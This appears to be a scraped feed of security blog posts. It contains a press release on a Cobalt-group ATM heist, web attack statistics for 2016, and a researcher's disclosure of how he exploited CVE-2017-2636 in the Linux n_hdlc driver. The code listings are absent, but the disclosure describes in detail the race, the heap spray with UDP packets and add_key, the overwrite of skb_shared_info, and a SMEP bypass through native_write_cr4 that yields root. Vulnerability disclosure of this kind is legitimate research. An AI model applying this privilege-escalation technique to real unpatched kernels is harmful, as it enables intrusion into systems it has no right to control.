Following an extensive investigation, cyber security company Positive Technologies has today revealed how hackers were able to steal the equivalent of £28,000 ($35,000), overnight, from six ATMs of an Eastern European bank. Its findings confirm that the theft could have been far worse as the technique used in the scam fortunately "clashed" with the financial institutions existing NCR ATM software, preventing the attackers from withdrawing further funds. It also warns that it’s likely that this group will soon become active in the West.


"Attacks against ATMs are often a preliminary step, from which attackers aim to infiltrate a bank’s network infrastructure," explains Alex Mathews, Lead Security Evangelist at Positive Technologies. "Modern day 'bank robbers' have realized that many financial institutions fail to adequately invest in security, and that some will even do the bare minimum to comply with required standards. The result is that, from an initial compromise, attackers can often move sideways, burrowing deeper into the network and infecting other systems within the banking infrastructure. Having gained control over key servers and ATM management systems, these criminals will often hit the jackpot with minimal effort and without tripping any alarms. Our investigation found that, for this Eastern European bank, the initial compromise was facilitated by a phishing scam and was successful as employees were spoofed into deploying the malware. This allowed the bank's local network to be compromised with the installation of malware on ATMs from the bank's internal infrastructure."

Publishing the findings of its investigation in an analytical report titled "Cobalt—a new trend or an old 'friend'?" Positive Technologies reveals the intricacies these modern cyberattacks utilized when targeting this bank, and that could be used against other financial institutions:

1. Attackers tend to use known instruments and integrated functionality of operating systems. In this heist, the criminals used commercial software—Cobalt Strike, comprising Beacon—a multi-function remote access Trojan with extensive capabilities for remote system control, enabling the upload and download of files, an escalation of privileges plus other functionality. The bank robbers also used Ammyy Admin, a legitimate freeware combined with Mimikatz, PsExec, SoftPerfect Network scanner, and Team Viewer applications.

2. Phishing emails are still one of the most successful attack vectors due to insufficient security awareness amongst employees.


The initial infrastructure infection vector originated from an employee opening a RAR compressed archive file documents.exe. The archive file was emailed to the employee, and the attached document contained the malware. Targeted mass phishing emails had been sent during the preceding months to a number of the bank’s email addresses, with the message imitating financial correspondence or security messages. Several employees opened the malicious file at different times, however one of the employees who launched the malware on their workstation had either disabled the antivirus engine, or the antivirus databases were outdated, allowing the malware to deploy.

3. Targeted attacks are becoming increasingly well-organized and distributed. The investigation revealed that the attack first started during early August. At the beginning of September, after a steady deployment in the infrastructure, the hackers launched a chain of attacks to detect which of the workstations were used by employees responsible for the ATM operation and payment card use. It was only in early October that the attackers uploaded malware to the ATMs and performed the heist (an operator sent commands to ATMs, and drops (individuals acting as cut-outs) visited an ATM at an appointed time to collect the stolen cash). The malware installed on the ATMs was specialized, dispensing money from an ATM to a drop at the command of the attacker. Drops themselves did not need to perform any special manipulations of the ATM.

While investigating the incident, Positive Technologies gathered multiple host and network indicators of compromise, which were sent to the relevant authorities, so that the information could be shared with other financial institutions to prevent similar future attacks.

Full research: www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf


Web application attack trends: government, e-commerce, and finance in the spotlight

$
0
0

Positive Technologies has revealed how hackers attacked web applications throughout 2016. The aim of our research was two-fold: to determine which attacks are most commonly used by hackers in the wild, and to find out which industries are being targeted and how. With this data, organizations can be more aware of digital threats and protect themselves accordingly.


Statistics


Out of the data analyzed, Government was by far the most under threat, logging nearly 70x more attacks per day than industrial systems, the sector with the least attacks. For governmental institutions, more than 70% of attempts were Path Traversal attacks. This relatively simple attack allows hackers to access vulnerable file system directories to potentially compromise files stored on servers.

E-commerce sites, characterized by an abundance of web applications, saw the second-highest average number of attacks in the sample day analyzed.  The finance sector rounded off the top three in terms of daily attack volumes, with the sample set registering an average of around 1,400 attacks per day. The transportation and IT companies analyzed had to withstand on average about 680 attacks
per day.

Number of attacks per day by sector


The most targeted sectors (in terms of attack volume) also saw the highest number of manual attacks. Nearly all (99%) of attacks against e-commerce sites did not use automated
software at all, potentially indicating a diverse range of isolated actors undertaking low-level attempts to exploit web application vulnerabilities.

A similarly high percentage of compromise attempts on governmental web applications also had manual origins. By contrast, most attacks across all remaining industries are performed with the help of specialized vulnerability detection software. Automated scanning includes attempts to perform various attacks such as SQL Injection and Path Traversal using security analysis tools.

Automated scanning vs. manual attacks

The most common attacks detected were SQL Injection and OS Commanding, which allows for a deeper level of compromise. Such attempts were recorded on over 80% of systems. The third-most common attack type was Path Traversal. Taken together, the prevalence of these more “primitive” techniques shows that hackers tend to focus on simple attacks with low barriers to entry.

Most popular attacks (% of web applications attacked)

Conclusion

Here is the summary of key findings:

  • Governmental organizations and e-commerce companies showed themselves to be particular targets. These two sectors are also subjected to the highest level of manual (non-automated) compromise attempts.
  • Attack types are tailored to specific sectors. For example, e-commerce sees a mix of attempts designed to cause downtime and access internal files. By contrast, 65% of all attacks in the finance sector attempt to steal the login information of website visitors.
  • Sectors seeing the lowest attack volumes, conversely, see the highest volume of automated web attacks from hackers, who use specialized software to search for vulnerabilities automatically.
  • Easy-to-execute methods such as SQL Injection and OS Commanding are the most commonly used methods across all sectors. Rarer attacks include Arbitrary File Execution and Cross-Site Request Forgery. 

Full report: www.ptsecurity.com/upload/corporate/ww-en/analytics/Web-Application-Attack-Trends-2017-eng.pdf 

CVE-2017-2636: exploit the race condition in the n_hdlc Linux kernel driver bypassing SMEP

$
0
0

This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).

This driver provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config. So RHEL 6/7, Fedora, SUSE, Debian, and Ubuntu were affected by CVE-2017-2636.

Currently the flaw is fixed in the mainline Linux kernel (public disclosure). The bug was introduced quite a long time ago, so the patch is backported to the stable kernel versions too.

I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts.

My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel attack (see xairy's implementation).

First of all let's watch the demo video!



The n_hdlc bug

Initially, N_HDLC line discipline used a self-made singly linked list for data buffers and had n_hdlc.tbuf pointer for buffer retransmitting after an error. It worked, but the commit be10eb75893 added data flushing and introduced racy access to n_hdlc.tbuf.

After tx error concurrent flush_tx_queue() and n_hdlc_send_frames() both use n_hdlc.tbuf and can put one buffer to tx_free_buf_list twice. That causes an exploitable double-free error in n_hdlc_release(). The data buffers are represented by struct n_hdlc_buf and allocated in the kmalloc-8192 slab cache.

For fixing this bug, I used a standard kernel linked list and got rid of racy n_hdlc.tbuf: in case of tx error the current n_hdlc_buf item is put after the head of tx_buf_list.

I started the investigation when got a suspicious kernel crash from syzkaller. It is a really great project, which helped to fix an impressively big list of bugs in Linux kernel.

Exploitation

This article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings!

Winning the race


Let's look to the code of the main loop: going to race till success.


The loop counter is incremented every iteration, so tmo1 and tmo2 variables are changing too. They are used for making lags in the racing threads, which:

  1. synchronize at the pthread_barrier,
  2. spin the specified number of microseconds in a busy loop,
  3. interact with n_hdlc.

Such a way of colliding threads helps to hit the race condition earlier.


Here we open a pseudoterminal master and slave pair and set the N_HDLC line discipline for it. For more information about that, see man ptmx, Documentation/serial/tty.txt and this great discussion about pty components.

Setting N_HDLC ldisc for a serial line causes the n_hdlc kernel module autoloading. You can get the same effect using ldattach daemon.


Here we suspend the pseudoterminal output (see man tty_ioctl) and write one data buffer. The n_hdlc_send_frames() fails to send this buffer and saves its address in n_hdlc.tbuf.

We are ready for the race. Start two threads, which are allowed to run on all available CPU cores:

  • thread 1: flush the data with ioctl(ptmd, TCFLSH, TCIOFLUSH);
  • thread 2: start the suspended output with ioctl(ptmd, TCXONC, TCOON).

In a lucky case, they both put the only written buffer pointed by n_hdlc.tbuf to tx_free_buf_list.

Now we return to the CPU 0 and trigger possible double-free error:


We close the pseudoterminal master. The n_hdlc_release() goes through n_hdlc_buf_list items and frees the kernel memory used for data buffers. Here the possible double-free error happens.

This particular bug is successfully detected by the Kernel Address Sanitizer (KASAN), which reports the use-after-free happening just before the second kfree().

The final part of the main loop:


Here we try to exploit the double-free error by overwriting struct sk_buff. In case of success, we exit from the main loop and run the root shell in the child process using execve().

Exploiting the sk_buff


As I mentioned, the doubly freed n_hdlc_buf item is allocated in the kmalloc-8192 slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects:

  • one containing some function pointer,
  • another one with the controllable payload, which can overwrite that pointer.

Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen sk_buff with its destructor_arg in struct skb_shared_info. This approach is not new – consider reading the cool write-up about CVE-2016-2384.

The network-related buffers in Linux kernel are represented by struct sk_buff. See these great pictures describing sk_buff data layout. The most important for us is that the network data and skb_shared_info are placed in the same kernel memory block pointed by sk_buff.head. So creating a 7500-byte network packet in the userspace will make skb_shared_info be allocated in the kmalloc-8192 slab cache. Exactly like we want.

But there is one challenge: n_hdlc_release() frees 13 n_hdlc_buf items straight away. At first I was trying to do the heap spray in parallel with n_hdlc_release(), but didn't manage to inject the corresponding kmalloc() between the needed kfree() calls. So I used another way: spraying after n_hdlc_release() can give two sk_buff items with the head pointing to the same memory. That's promising.

So we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP):

  • one client socket for sending UDP packets,
  • one dedicated server socket, which is likely to receive two packets with the same sk_buff.head,
  • 200 server sockets for receiving other packets emitted during heap spray,
  • 200 server sockets for receiving the packets emitted during slab exhaustion.

Ok. Now we need another kernel object for overwriting the function pointer in skb_shared_info.destructor_arg. We can't use sk_buff.head for that again, because skb_shared_info is placed at the same offset in sk_buff.head and we don't control it. I was really happy to find that add_key syscall is able to allocate the controllable data in the kmalloc-8192 too.

But I became upset when encountered key data quotas in /proc/sys/kernel/keys/ owned by root. The default value of /proc/sys/kernel/keys/maxbytes is 20000. It means that only 2 add_key syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough.

But the happiness returned when I encountered the bright idea at the slides of Di Shen from Keen Security Lab: I can make the heap spray successful even if add_key fails!

So, let's look at the init_payload() code:


The definition of struct skb_shared_info and struct ubuf_info is copied to the exploit code from include/linux/skbuff.h kernel header.

The payload buffer will be passed to add_key as a parameter, and the data which we put there at 7872 - 18 = 7854 byte offset will exactly overwrite skb_shared_info.


The ubuf_info.callback is called in skb_release_data() if skb_shared_info.tx_flags has SKBTX_DEV_ZEROCOPY flag set to 1. In our case, ubuf_info item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.

Anyway, now the callback points to root_it(), which does the classical commit_creds(prepare_kernel_cred(0)). However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.

Heap spraying and stabilization


As I mentioned, n_hdlc_release() frees thirteen n_hdlc_buf items. Our exploit_skb() is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.

Now we are going to perform the use-after-free on sk_buff.data:

  • receive 4 network packets on the dedicated server socket one by one,
  • execute several add_key syscalls with our payload after receiving each of them.

The exact number of add_key syscalls giving the best results was found empirically by testing the exploit many times. The example of add_key call:


If we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:


Now we need to prepare the heap to the next round of n_hdlc racing. The /proc/slabinfo shows that kmalloc-8192 slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable – send a dozen UDP packets to fill the partially emptied slabs.

SMEP bypass

As I mentioned, the root_it() shellcode resides in the userspace. Executing it in the kernelspace is detected by SMEP (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register.

There are several approaches to defeat it, for example, Vitaly Nikolenko describes how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.

In arch/x86/include/asm/special_insns.h I've found this function:


It writes its first argument to CR4.

Now let's look at skb_release_data(), which executes the hijacked callback in the Ring 0:


We see that the destructor callback takes uarg address as the first argument. And we control this address in the exploited sk_buff.

So I've decided to write the address of native_write_cr4() to ubuf_info.callback and put ubuf_info item at the mmap'ed userspace address 0x406e0, which is the correct value of CR4 with disabled SMEP.

In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable.

So let's initialize the payload a bit differently:


That SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1. Otherwise target_addr becomes 0 and mmap() fails, since mapping the zero page is not allowed.

Conclusion

Investigating of CVE-2017-2636 and writing this article was a big fun for me. I want to thank Positive Technologies for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.

Author: Alexander Popov


Viewing all 198 articles
Browse latest View live